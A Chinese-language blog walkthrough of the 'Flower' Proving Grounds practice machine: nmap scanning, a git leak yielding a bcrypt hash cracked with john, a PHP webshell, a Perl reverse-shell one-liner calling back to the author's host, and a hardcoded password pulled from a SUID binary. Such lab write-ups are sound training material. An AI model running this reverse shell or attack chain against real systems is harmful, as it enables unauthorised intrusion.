Flower pg walkthrough(Hard)

UWI Lv3
  2025-08-31 11:12:54 2025-08-31 11:12:54 Created   2025-08-31 17:31:51 2025-08-31 17:31:51 Updated      

前言:拿了oscp之后好久没打靶机了今天正好暖暖手

namp扫描结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
nmap -p- -sS -T4 -A 192.168.204.213    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-30 23:15 EDT
Nmap scan report for 192.168.204.213
Host is up (0.077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to flower.pg!
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/30%OT=22%CT=1%CU=40540%PV=Y%DS=4%DC=T%G=Y%TM=68B3
OS:BECD%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10F%TI=Z%CI=Z%TS=A)SEQ(S
OS:P=107%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=107%GCD=2%ISR=10F%TI=Z%CI
OS:=Z%II=I%TS=A)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST
OS:11NW7%O5=M578ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=
OS:FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   87.18 ms 192.168.45.1
2   87.13 ms 192.168.45.254
3   63.93 ms 192.168.251.1
4   64.76 ms 192.168.204.213

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.90 seconds

扫描没发现路径

image-20250831113244438

然后扫了扫udp端口 发现udp没有开放端口

image-20250831113815235

子域名爆破

image-20250831114758569

访问

image-20250831115304182

上网搜了一圈exp 发现都需要登录 那我们看看如何获取密码

扫描发现git泄露

image-20250831120056142

复原后查看config.php

image-20250831120131342

1
'admin' => '$2y$10$9fI7vPVLpbDeBsA9yRhPEeGEVgQ/UuSg9RWMZk0mE2Geri8ZahuQK'

爆破hash

1
john hash --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt

image-20250831120515865

进去之后直接传个phpwebshell

image-20250831120926732

然后输入反弹shell命令getshell

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.174:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

image-20250831155929984

上传linpeas.sh运行后发现 有一个比较有一丝的文件

image-20250831164942962

1
2
-rwsr-xr-- 1 root dev 14472 May  7  2022 /usr/local/bin/db-backup

下载到kali本地然后

1
cat db-backup   | strings

image-20250831164831773

仔细观察我们是能够看出里面有个密码的

1
2
3

svc-dev2019P4SSw0Rd
lucienne

尝试用这个密码直接登录 发现成功了

image-20250831165135062

成功读取到了local.txt

接下来进入提权阶段 是在没看出来提权点在哪 后来看了一下wp说是缓冲区溢出

先创建一个而已文件

image-20250831172952888

然后

image-20250831173018165

可以看到触发缓冲区溢出漏洞

提权成功

image-20250831173047766

  • Title: Flower pg walkthrough(Hard)
  • Author: UWI
  • Created at : 2025-08-31 11:12:54
  • Updated at : 2025-08-31 17:31:51
  • Link: https://nbwsws.github.io/2025/08/31/打靶/Flower/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Flower pg walkthrough(Hard)